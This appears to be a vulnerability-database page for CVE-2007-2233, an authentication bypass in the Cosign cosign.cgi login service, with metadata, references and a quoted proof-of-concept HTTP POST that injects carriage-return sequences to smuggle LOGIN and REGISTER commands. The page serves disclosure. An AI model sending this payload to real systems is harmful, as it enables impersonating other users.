Cosign 'cosign.cgi'权限管理和访问控制漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112678 漏洞类型 未知
发布时间 2007-04-11 更新时间 2007-04-25
CVE编号 CVE-2007-2233 CNNVD-ID CNNVD-200704-513
漏洞平台 CGI CVSS评分 6.5
|漏洞来源
https://www.exploit-db.com/exploits/29844
https://www.securityfocus.com/bid/86300
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-513
|漏洞详情
Cosign中的cosign-bin/cosign.cgi存在权限管理和访问控制漏洞。远程认证用户可以通过在service参数中使用CR(\r)序列,注入登录和注册指令,以任意用户的身份执行未授权操作。
|漏洞EXP
source: http://www.securityfocus.com/bid/23424/info

The 'cosign' application is prone to an authentication-bypass vulnerability because it fails to adequately sanitize user-supplied input.

An authenticated attacker can exploit this issue to access services hosted on an affected computer by assuming another user's credentials.

Versions prior to 1.9.4b and 2.0.2a are vulnerable. 

POST /cosign-bin/cosign.cgi HTTP/1.0
Host: weblogin.example.com
Cookie: cosign=X
Content-Type: application/x-www-form-urlencoded
Content-Length: N

required=&ref=https%3A%2F%2Fweblogin.example.com%2F&service=cosign-servicename=Y%0DLOGIN cosign=X2 1.2.3.4 username%0DREGISTER cosign=X2 1.2.3.4 cosign-servicename=Y2&login=test&password=pass&passcode=&doLogin=Log+In
|受影响的产品
Cosign Cosign 1.8.5 Cosign Cosign 0.9 Cosign Cosign 0.7 Cosign Cosign 2.0.2 Cosign Cosign 2.0.1 Cosign Cosign 1.9 Cosign Cosign 1.8 Cosi
|参考资料

来源:BUGTRAQ
名称:20070411CosignSSOAuthenticationBypass
链接:http://www.securityfocus.com/archive/1/archive/1/465386/100/100/threaded
来源:VUPEN
名称:ADV-2007-1359
链接:http://www.frsirt.com/english/advisories/2007/1359
来源:SECUNIA
名称:24845
链接:http://secunia.com/advisories/24845
来源:www.umich.edu
链接:http://www.umich.edu/~umweb/software/cosign/cosign-vuln-2007-002.txt